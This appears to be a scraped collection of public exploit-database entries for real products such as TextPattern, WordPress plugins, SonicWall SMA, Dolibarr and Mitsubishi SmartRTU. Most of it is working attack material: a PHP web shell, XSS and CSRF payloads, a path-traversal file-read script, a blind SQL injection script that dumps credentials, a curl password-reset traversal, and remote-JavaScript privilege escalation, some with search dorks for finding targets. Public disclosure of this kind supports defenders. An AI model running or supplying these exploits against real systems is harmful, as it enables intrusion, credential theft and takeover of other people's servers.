ISHACK AI BOT

# Exploit Title: TextPattern CMS 4.8.7 - Remote Command Execution (RCE) (Authenticated) # Date: 2021/09/06 # Exploit Author: Mert Daş [email protected] # Software Link: https://textpattern.com/file_download/113/textpattern-4.8.7.zip # Software web: https://textpattern.com/ # Tested on: Server: Xampp First of all we should use file upload section to upload our shell. Our shell contains this malicious code: <?PHP system($_GET['cmd']);?> 1) Go to content section . 2) Click Files and upload malicious php file. 3) go to yourserver/textpattern/files/yourphp.php?cmd=yourcode; After upload our file , our request and response is like below : Request: GET /textpattern/files/cmd.php?cmd=whoami HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Cookie: txp_login_public=18e9bf4a21admin; language=en-gb; currency=GBP; PHPSESSID=cctbu6sj8571j2t6vp7g8ab7gi Upgrade-Insecure-Requests: 1 Response: HTTP/1.1 200 OK Date: Thu, 10 Jun 2021 00:32:41 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20 X-Powered-By: PHP/7.4.20 Content-Length: 22 Connection: close Content-Type: text/html; charset=UTF-8 pc\mertdas

# Exploit Title: SolarWinds Kiwi CatTools 3.11.8 - Unquoted Service Path # Exploit Author: Mert DAŞ # Version: 3.11.8 # Date: 14.10.2021 # Vendor Homepage: https://www.solarwinds.com/ # Tested on: Windows 10 # Step to discover Unquoted Service Path : -------------------------------------- C:\Users\Mert>sc qc CatTools [SC] QueryServiceConfig SUCCESS SERVICE_NAME: CatTools TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\CatTools3\nssm.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : CatTools DEPENDENCIES : SERVICE_START_NAME : LocalSystem --------------------------------------------- Or: ------------------------- C:\Users\Mert>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ ---------------------- #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: i-Panel Administration System 2.0 - Reflected Cross-site Scripting (XSS) # Date: 04.10.2021 # Exploit Author: Forster Chiu # Vendor Homepage: https://www.hkurl.com # Version: 2.0 # Tested on: Chrome, Edge and Firefox # CVE: CVE-2021-41878 # Reference: https://cybergroot.com/cve_submission/2021-1/XSS_i-Panel_2.0.html As a proof of concept, an alert box can be generated with the following payload. Exploit PoC: GET /lostpassword.php/n4gap%22%3E%3Cimg%20src=a%20onerror=alert(%22XSSVulnerable%22)%3E HTTP/1.1 Host: Forster Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Cookie: PHPSESSID=7db442d0ed0f9c8e21f5151c3711973e User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept-Language: en-gb Accept-Encoding: gzip, deflate Connection: close

# Exploit Title: Support Board 3.3.4 - 'Message' Stored Cross-Site Scripting (XSS) # Date: 16/10/2021 # Exploit Author: John Jefferson Li <[email protected]> # Vendor Homepage: https://board.support/ # Software Link: https://codecanyon.net/item/support-board-help-desk-and-chat/20359943 # Version: 3.3.4 # Tested on: Ubuntu 20.04.2 LTS, Windows 10 POST /supportboard/include/ajax.php HTTP/1.1 Cookie: [Agent+] Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 808 X-Requested-With: XMLHttpRequest Connection: close function=add-note&conversation_id=476&user_id=2&name=Robert+Smith&message=%3CScRiPt%3Ealert(/XSS/)%3C%2FsCriPt%3E&login-cookie=<cookie>&language=false

# Exploit Title: Company's Recruitment Management System 1.0. - 'title' Stored Cross-Site Scripting (XSS) # Date: 17-10-2021 # Exploit Author: Aniket Deshmane # Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip # Version: 1 # Tested on: Windows 10,XAMPP Steps to Reproduce: 1)Navigate to http://127.0.0.1/employment_application & Login with staff account . 2) Navigate to vacancies tab 3) Click on Add new . 4)Add Payload "><img src=x onerror=alert(1)> in Vacancy Title field. 5)Click on Save and you are done. It's gonna be triggered when anyone visits the application. Request:- POST /employment_application/Actions.php?a=save_vacancy HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------15502044322641666722659366422 Content-Length: 931 Origin: http://127.0.0.1 DNT: 1 Connection: close Cookie: PHPSESSID=e00mbu2u5cojpsh5jkaj9pjlfc Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Cache-Control: no-transform -----------------------------15502044322641666722659366422 Content-Disposition: form-data; name="id" -----------------------------15502044322641666722659366422 Content-Disposition: form-data; name="title" "><img src=x onerror=alert(1)> -----------------------------15502044322641666722659366422 Content-Disposition: form-data; name="designation_id" 1 -----------------------------15502044322641666722659366422 Content-Disposition: form-data; name="slots" 1 -----------------------------15502044322641666722659366422 Content-Disposition: form-data; name="status" 1 -----------------------------15502044322641666722659366422 Content-Disposition: form-data; name="description" -----------------------------15502044322641666722659366422 Content-Disposition: form-data; name="files"; filename="" Content-Type: application/octet-stream -----------------------------15502044322641666722659366422--

# Exploit Title: Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read # Date: October 16, 2021 # Exploit Author: nam3lum # Vendor Homepage: https://wordpress.org/plugins/duplicator/ # Software Link: https://downloads.wordpress.org/plugin/duplicator.1.3.26.zip] # Version: 1.3.26 # Tested on: Ubuntu 16.04 # CVE : CVE-2020-11738 import requests as re import sys if len(sys.argv) != 3: print("Exploit made by nam3lum.") print("Usage: CVE-2020-11738.py http://192.168.168.167 /etc/passwd") exit() arg = sys.argv[1] file = sys.argv[2] URL = arg + "/wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../../../../.." + file output = re.get(url = URL) print(output.text)

# Exploit Title: Mitsubishi Electric & INEA SmartRTU - Reflected Cross-Site Scripting (XSS) # Date: 2021-17-10 # Exploit Author: Hamit CİBO # Vendor Homepage: https://www.inea.si # Software Link: https://www.inea.si/telemetrija-in-m2m-produkti/mertu/ # Version: ME RTU # Tested on: Windows # CVE : CVE-2018-16061 # PoC # Request POST /login.php/srdzz'onmouseover%3d'alert(1)'style%3d'position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25% 3btop%3a0%3bleft%3a0%3b'bsmy8 HTTP/1.1 Host: **.**.**.*** Content-Length: 132 Cache-Control: max-age=0 Origin: http://**.**.**.*** Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: http://**.**.**.***sss/login.php Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=el8pvccq5747u4qj9koio950l7 Connection: close submitted=1&username=-- %3E%27%22%2F%3E%3C%2FsCript%3E%3CsvG+x%3D%22%3E%22+onload%3D%28co%5Cu006efirm%29%60%60&passw ord=&Submit=Login # Response HTTP/1.1 200 OK Date: Wed, 08 Aug 2018 08:14:25 GMT Server: Apache/2.4.7 (Ubuntu) X-Powered-By: PHP/5.5.9-1ubuntu4 Vary: Accept-Encoding Content-Length: 3573 Connection: close Content-Type: text/html <div id='fg_membersite' class='login_form'> <form id='login' name='login' action='/login.php/srdzz'onmouseover='alert(1)'style='position:absolute;width:100%;height:100%;top:0;left:0;'bsmy8' method='post' accept-charset='UTF-8'> Reference : https://drive.google.com/file/d/1DEZQqfpIgcflY2cF6O0y7vtlWYe8Wjjv/view

# Exploit Title: Mitsubishi Electric & INEA SmartRTU - Source Code Disclosure # Date: 2021-17-10 # Exploit Author: Hamit CİBO # Vendor Homepage: https://www.inea.si # Software Link: https://www.inea.si/telemetrija-in-m2m-produkti/mertu/ # Version: ME RTU # Tested on: Windows # CVE : CVE-2018-16060 # PoC # Request GET /web HTTP/1.1 Host: **.**.**.*** Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close # Response HTTP/1.1 200 OK Date: Wed, 08 Aug 2018 08:09:53 GMT Server: Apache/2.4.7 (Ubuntu) Content-Location: web.tar Vary: negotiate TCN: choice Last-Modified: Wed, 19 Nov 2014 09:40:36 GMT ETag: "93800-5083300f58d00;51179459a2c00" Accept-Ranges: bytes Content-Length: 604160 Connection: close Content-Type: application/x-tar Reference : https://drive.google.com/open?id=1QMHwTnBbIqrTkR0NEpnTKssYdi8vRsHH

# Exploit Title: Company's Recruitment Management System 1.0 - 'description' Stored Cross-Site Scripting (XSS) # Date: 18-10-2021 # Exploit Author: Aniket Anil Deshmane # Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip # Version: 1 # Tested on: Windows 10,XAMPP Step to reproduce:- 1)Login with staff account & Navigate to Vacancies tab. 2)Click on add new vacancies .Put any random information on other field except description & go to the description window . 3)In the description field select insert link . 5) In Text to display the field add the following payload . "><img src=x onerror=alert(1)> *6)Click on save & you are done.It's gonna be triggered when some one open vacancies details * Request:- POST /employment_application/Actions.php?a=save_vacancy HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------156186133432167175201476666002 Content-Length: 1012 Origin: http://127.0.0.1 DNT: 1 Connection: close Referer: http://127.0.0.1/employment_application/admin/?page=vacancies Cookie: PHPSESSID=ah0lpri38n5c4ke3idhbkaabfa Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------156186133432167175201476666002 Content-Disposition: form-data; name="id" -----------------------------156186133432167175201476666002 Content-Disposition: form-data; name="title" Test1ee -----------------------------156186133432167175201476666002 Content-Disposition: form-data; name="designation_id" 4 -----------------------------156186133432167175201476666002 Content-Disposition: form-data; name="slots" 1 -----------------------------156186133432167175201476666002 Content-Disposition: form-data; name="status" 1 -----------------------------156186133432167175201476666002 Content-Disposition: form-data; name="description" <p><br><a href="http://google.com" target="_blank">"><img src="x" onerror="alert(1)"></a></p> -----------------------------156186133432167175201476666002 Content-Disposition: form-data; name="files"; filename="" Content-Type: application/octet-stream -----------------------------156186133432167175201476666002--

# Exploit Title: Plastic SCM 10.0.16.5622 - WebAdmin Server Access # Shodan Dork: title:"Plastic SCM" # Date: 18.10.2021 # Exploit Author: Basavaraj Banakar # Vendor Homepage: https://www.plasticscm.com/ # Software Link: https://www.plasticscm.com/download/releasenotes/10.0.16.5622 # Version: Plastic SCM < 10.0.16.5622 # Tested on: Chrome,Firefox,Edge # CVE : CVE-2021-41382 # Reference: https://infosecwriteups.com/story-of-google-hall-of-fame-and-private-program-bounty-worth-53559a95c468 # Exploit: 1. Navigate to target.com/account [This holds administrator login console] 2. Change URL to target.com/account/register [Here able to set new password for the adminstrator user] 3. Now after changing password of administrator and login to console and Navigate to target.com/configuration/authentication and set an new password for any of the users 4. Now navigate to target.com/webui/repos and login with the recently changed password for user i.e is in step 3

# Exploit Title: Company's Recruitment Management System 1.0 - 'Add New user' Cross-Site Request Forgery (CSRF) # Date: 18-10-2021 # Exploit Author: Aniket Anil Deshmane # Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip # Version: 1 # Tested on: Windows 10,XAMPP Detail: The application is not using any security token to prevent it against CSRF. Therefore, malicious user can add new administrator user account by using a crafted post request. CSRF POC:- <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://127.0.0.1/employment_application/Actions.php?a=save_user" method="POST"> <input type="hidden" name="id" value="" /> <input type="hidden" name="fullname" value="Test" /> <input type="hidden" name="username" value="Test" /> <input type="hidden" name="type" value="1" /> <input type="submit" value="Submit request" /> </form> </body> </html>

# Exploit Title: WordPress Theme Enfold 4.8.3 - Reflected Cross-Site Scripting (XSS) # Google Dork: "inurl:avia-element-paging" # Date: 18/10/2021 # Exploit Author: Francisco Díaz-Pache Alonso, Sergio Corral Cristo and David Álvarez Robles # Vendor Homepage: https://kriesi.at/ # Version: Enfold < 4.8.4 (all versions) # Tested on: Ubuntu # CVE : CVE-2021-24719 # Full disclosure and PoC on: https://blog.asturhackers.es/cross-site-scripting-xss-reflejado-en-tema-enfold-4-8-4-para-wordpress While navigating on WordPress sites with Enfold Theme previous than 4.8.4 version and Avia Page Builder, string “ProofOfConcept” can be reflected literally on pagination numbers. Moreover, the parameter “avia-element-paging” appears and can be used for crafting Google Dork based searches. https://[hostname]/[path]?ProofOfConcept --> This URL must include pages shown by Enfold theme Changing the “ProofOfConcept” text with a Cross-Site-Scripting (XSS) payload, the page processes and executes it. This is a reflected Cross-Site-Scripting (XSS) vulnerability. Find the following URL that includes the malicious payload. https://[hostname]/[path]/?%2527%253E%253Cscript%253Eeval%2528atob%2528%2522Y29uc29sZS5sb2coZG9j --> This URL must include pages shown by Enfold theme Payload (double encoded): this payload is double encoded in the URL from: '><script>eval(atob("Y29uc29sZS5sb2coZG9jdW1lbnQuY29va2llKQ=="))</script> Payload (base64): the “atob” payload is Base64 encoded from: console.log(document.cookie) Navigating to the crafted URL, the console log displays some cookies that are used by the affected site (i.e. cookies with no “HttpOnly” flag set). However, the payload can be easily configurable.

# Exploit Title: myfactory FMS 7.1-911 - 'Multiple' Reflected Cross-Site Scripting (XSS) # Exploit Author: RedTeam Pentesting GmbH # Vendor Homepage: https://www.myfactory.com/ # Version: Enfold < 4.8.4 (all versions) # Tested on: Ubuntu # CVE : CVE-2021-42565, CVE-2021-42566 # Reference: https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms During a penetration test, a reflected cross-site scripting vulnerability (XSS) was found in the myfactory.FMS login form. If a user opens an attacker-prepared link to the application, attackers can run arbitrary JavaScript code in the user's browser. Introduction ============ "With myfactory, you get a modern accounting application for your business. It covers every functionality necessary for an accounting system." (translated from German from the vendor's homepage) More Details ============ The myfactory.FMS web application[0] allows users to login with a username and password. If the password is wrong, the application redirects to a URL similar to the following: http://www.example.com/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=RedTeam The application then opens a dialogue telling the user that their username or password are wrong and uses the value of the parameter UID to prefill the login form resulting in the following source code: ------------------------------------------------------------------------ <td> <input NAME="txtUID" VALUE="RedTeam" onkeypress="OnKeyPress(event)" placeholder="Benutzername" > </td> ------------------------------------------------------------------------ The UID parameter gets reflected without applying any encoding to it. A similar problem arises when the login leads to an error. This introduces a new parameter named 'Error': http://www.example.com/ie50/system/login/SysLoginUser.aspx?Login=Error&Error=RedTeam_Error The value of the Error parameter gets appended without encoding in the javascript function mOnLoad resulting in the following code: ------------------------------------------------------------------------ function mOnLoad( { var sParams; alert('Das System konnte Sie nicht anmelden.\n RedTeam_Error'); [...] ------------------------------------------------------------------------ Proof of Concept ================ The XSS in the UID parameter can be triggered with the following URL: http://www.example.com/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID="><script>alert("RedTeam+Pentesting")</script><span+" This will lead to the following HTML returned by the server: ------------------------------------------------------------------------ <td> <input NAME="txtUID" VALUE=""><script>alert("RedTeam Pentesting")</script><span "" onkeypress="OnKeyPress(event)" placeholder="Benutzername" > </td> ------------------------------------------------------------------------ To demonstrate the XSS via the Error parameter, the following URL can be used: http://www.example.com/ie50/system/login/SysLoginUser.aspx?Login=Error&Error=');alert("RedTeam+Pentesting");// This will lead to the following JavaScript embedded in the HTML website returned by the server: ------------------------------------------------------------------------ function mOnLoad( { var sParams; alert('Das System konnte Sie nicht anmelden.\n ');alert("RedTeam+Pentesting");//'); [...] ------------------------------------------------------------------------ Workaround ========== None Fix === Install Version 7.1-912 or later. Security Risk ============= This security vulnerability allows to execute arbitrary JavaScript code in users' browsers if they access URLs prepared by attackers. This provides many different possibilities for further attacks against these users. The vulnerability could for example be exploited to display a fake login to obtain credentials and consequently access a company's accounting information. Since attackers might be able to get access to sensitive financial data, but users have to actively open an attacker-defined link, this vulnerability is estimated to pose a medium risk. Timeline ======== 2021-05-07 Vulnerability identified 2021-05-27 Customer approved disclosure to vendor 2021-06-07 Vendor notified, support confirms vulnerability and implements fix. Support says vendor does not agree to a public advisory. 2021-06-10 Vendor contacts RedTeam Pentesting, reiterates that no advisory should be released. Vendor acknowledges public release after 90 days. 2021-10-04 Customer confirms update to fixed version 2021-10-13 Advisory released 2021-10-14 CVE-ID requested 2021-10-18 CVE-ID assigned References ========== [0] https://www.myfactory.com/myfactoryfms.aspx

# Exploit Title: Online Motorcycle (Bike) Rental System 1.0 - Blind Time-Based SQL Injection (Unauthenticated) # Exploit Author: Chase Comardelle(CASO) # Date: October 18, 2021 # Vendor Homepage: https://www.sourcecodester.com/php/14989/online-motorcycle-bike-rental-system-phpoop-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/bike_rental_0.zip # Tested on: Kali Linux, Apache, Mysql # Vendor: oretnom23 # Version: v1.0 # Exploit Description: # Online Motorcycle (Bike) Rental System is vulnerable to a Blind Time-Based SQL Injection attack. This can lead attackers to remotely dump MySql database credentials #EXAMPLE PAYLOAD - [email protected]' UNION SELECT IF((SELECT SUBSTRING((SELECT password from users where username='admin'),1,1)='1'),sleep(10),'a'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL; #EXAMPLE EXECUTION - python3 sqliExploit.py http://localhost/bike_rental/ import requests import sys import urllib3 import pyfiglet urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'} def find_clients_usernames(url): clients = "" cookies = {'Cookie:':'PHPSESSID='} headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'} path = '/classes/Login.php?f=login_user' position = 1 i=0 while i <len(chars) : sqli = "[email protected]'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(email+SEPARATOR+',')+from+clients),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i]) r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False) if r.elapsed.total_seconds() > 1: clients += chars[i] i=0 position+=1 else: i +=1 return clients def find_db_usernames(url): users = "" cookies = {'Cookie:':'PHPSESSID='} headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'} path = '/classes/Login.php?f=login_user' position = 1 i=0 while i <len(chars) : sqli = "[email protected]'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(username+SEPARATOR+',')+from+users),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i]) r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False) if r.elapsed.total_seconds() > 1: users += chars[i] i=0 position+=1 else: i +=1 return users def find_db_passwords(url): passwords = "" clientCount = 0 cookies = {'Cookie:':'PHPSESSID='} headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'} path = '/classes/Login.php?f=login_user' position = 1 i=0 while i <len(chars) : sqli = "[email protected]'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(password+SEPARATOR+',')+from+users),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i]) r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False) if r.elapsed.total_seconds() > 1: passwords += chars[i] i=0 position+=1 else: i +=1 return passwords def find_client_passwords(url): passwords = "" clientCount = 0 cookies = {'Cookie:':'PHPSESSID='} headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'} path = '/classes/Login.php?f=login_user' position = 1 i=0 while i <len(chars) : sqli = "[email protected]'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(password+SEPARATOR+',')+from+clients),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i]) r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False) if r.elapsed.total_seconds() > 1: passwords += chars[i] i=0 position+=1 else: i +=1 return passwords def create_table(users,passwords): for i in range(0,len(users)): print(users[i]," | ",passwords[i]) def print_header(): print("[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]") print("[*] Online Motorcycle (Bike) Rental System [*]") print("[*] Unauthenticated Blind Time-Based SQL Injection [*]") print("[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]") print("\n") print(pyfiglet.figlet_format(" CAS0", font = "slant" )) chars = [ 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o', 'p','q','r','s','t','u','v','w','x','y','z','A','B','C','D', 'E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S', 'T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7', '8','9','@','#',",",'.'] if __name__ == "__main__": try: url = sys.argv[1].strip() except IndexError: print("[-] Usage: %s <url>" % sys.argv[0]) print("[-] Example: %s www.example.com" % sys.argv[0]) sys.exit(-1) print_header() print("[*] RETRIEVING CREDENTIALS NOW [*]") dbUsernames = find_db_usernames(url) dbUsernames = dbUsernames.split(",") dbPasswords = find_db_passwords(url) dbPasswords = dbPasswords.split(",") print("[*] DATABASE CREDENTIALS [*]") create_table(dbUsernames,dbPasswords) clientUsernames = find_clients_usernames(url) clientsUsernames = clientUsernames.split(",") clientPasswords = find_client_passwords(url) clientPasswords = clientPasswords.split(",") print("[*] CLIENT CREDENTIALS [*]") create_table(clientsUsernames,clientPasswords)

# Exploit Title: SonicWall SMA 10.2.1.0-17sv - Password Reset # Description: Overwrite the persistent database, resulting in password reset on reboot. # Shodan Dork: https://www.shodan.io/search?query=title%3A%22Virtual+Office%22+%22Server%3A+SonicWall%22 # Date: 10/19/2021 # Exploit Author: Jacob Baines (@Junior_Baines) # Root Cause Analysis: https://attackerkb.com/topics/23t9VCbGzt/cve-2021-20034/rapid7-analysis?referrer=profile # Vendor Homepage: https://www.sonicwall.com/ # Version: SMA 100 Series using 9.0.0.10-28sv, 10.2.0.7-34sv, and 10.2.1.0-17sv # Tested on: SMA 500v using 9.0.0.10-28sv and 10.2.1.0-17sv # CVE : CVE-2021-20034 curl -v --insecure "https://10.0.0.6/cgi-bin/handleWAFRedirect?hdl=../flash/etc/EasyAccess/var/conf/persist.db"

# Exploit Title: Macro Expert 4.7 - Unquoted Service Path # Exploit Author: Mert DAŞ # Version: 4.7 # Date: 20.10.2021 # Vendor Homepage: http://www.macro-expert.com/ # Tested on: Windows 10 C:\Users\Mert>sc qc "Macro Expert" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: Macro Expert TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : c:\program files (x86)\grasssoft\macro expert\MacroService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Macro Expert DEPENDENCIES : SERVICE_START_NAME : LocalSystem --------------------------------------------- Or: ------------------------- C:\Users\Mert>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: Dolibarr ERP-CRM 14.0.2 - Stored Cross-Site Scripting (XSS) / Privilege Escalation # Exploit Author: Oscar Gutierrez (m4xp0w3r) # Date: 18/10/2021 # Vendor Homepage: https://www.dolibarr.org/ # Software Link: https://github.com/Dolibarr # Tested on: Ubuntu, LAAMP # Vendor: Dolibarr # Version: v14.0.2 # Exploit Description: # Dolibarr ERP & CRM v14.0.2 suffers from a stored XSS vulnerability in the ticket creation flow that allows a low level user (with full access to the Tickets module) to achieve full permissions. For this attack vector to work, an administrator user needs to copy the text in the "message" box. # Instructions: #1. Insert this payload in the message box when creating a ticket: "><span onbeforecopy="let pwned = document.createElement('script'); pwned.setAttribute('src', 'http://YOURIPGOESHERE/hax.js'); document.body.appendChild(pwned);" contenteditable>test</span> # #2. Host this file (Change the extension of the file to js and remove comments) in a remote http location of your preference. #NOTE: The user id in /dolibarr/htdocs/user/perms.php?id=2 may vary depending on the installation so you might have to change this. In my case, I had only 2 users, user 2 being the low level user. # #3.Once an administrator user copies the text within the ticket the attack will launch. function read_body(xhr) { var data = xhr.responseXML; var tokenizedUrl = data.getElementsByClassName("reposition commonlink")[0].href; console.log(tokenizedUrl); return tokenizedUrl; } function escalatePrivs() { var url = read_body(xhr); var http = new XMLHttpRequest(); http.open('GET', url); http.onreadystatechange = function() { if (this.readyState === XMLHttpRequest.DONE && this.status === 200) { return; } }; http.send(null); } var xhr = new XMLHttpRequest(); xhr.onreadystatechange = function() { if (xhr.readyState == XMLHttpRequest.DONE) { read_body(xhr); escalatePrivs(xhr); } } xhr.open('GET', '/dolibarr/htdocs/user/perms.php?id=2', true);

# Exploit Title: NIMax 5.3.1 - 'Remote VISA System' Denial of Service (PoC) # Date: 24/06/2021 # Exploit Author: LinxzSec # Vulnerability: Local Denial of Service (DoS) # Vendor Homepage: https://www.ni.com/en-gb.html # Software Link: License Required - https://knowledge.ni.com/KnowledgeArticleDetails?id=kA03q000000YGQwCAO&l=en-GB # Tested Version: 5.3.1f0 # Tested On: Windows 10 Pro x64 '''[ POC ] 1 - Copy printed "AAAAA..." string from "nimax.txt" 2 - Open NIMax.exe 3 - Right click "Remote systems" and press "Create New" 4 - Select "Remote VISA System" and press "Next" 5 - Paste clipboard in "Remote VISA System Address" 6 - Press finish and DoS will occur ''' buffer = "\x41" * 5000 try: f = open("nimax.txt", "w") f.write(buffer) f.close() print("[+] File created!") except: print("[+] File could not be created!")

# Exploit Title: NIMax 5.3.1f0 - 'VISA Alias' Denial of Service (PoC) # Date: 24/06/2021 # Exploit Author: LinxzSec # Vulnerability: Local Denial of Service (DoS) # Vendor Homepage: https://www.ni.com/en-gb.html # Software Link: License Required - https://knowledge.ni.com/KnowledgeArticleDetails?id=kA03q000000YGQwCAO&l=en-GB # Tested Version: 5.3.1f0 # Tested On: Windows 10 Pro x64 '''[ POC ] 1 - Copy printed "AAAAA..." string from "nimax.txt" 2 - Open NIMax.exe 3 - Drop down "My System" then drop down "Software" 5 - Locate "NI-VISA 5.2" and select it 6 - Open the "VISA Options" tab 7 - Drop down "General settings" 8 - Select "Aliases" 9 - Select "Add alias" 10 - Paste string from "nimax.txt" into "Resource name" 11 - Just put a single character in the alias and press "ok", DoS will occur ''' buffer = "\x41" * 5000 try: f = open("nimax.txt", "w") f.write(buffer) f.close() print("[+] File created!") except: print("[+] File could not be created!")

